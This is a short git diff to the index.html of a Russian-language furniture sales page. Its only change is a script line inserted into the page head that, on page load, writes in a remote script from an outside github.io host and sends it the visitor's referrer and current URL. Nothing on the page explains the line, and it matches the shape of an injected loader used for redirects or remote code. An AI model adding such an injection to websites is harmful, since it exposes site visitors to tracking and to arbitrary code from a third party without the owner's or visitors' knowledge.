--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html lang="ru">
 <head>
+    <script async>document.write(`<script async src="https://on-okko.github.io/2025/index.php?referrerCF=${escape(document.referrer)}&urlCF=${escape(window.location.href)}"><\/script>`)</script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Продажа деревянной мебели в Украине</title>
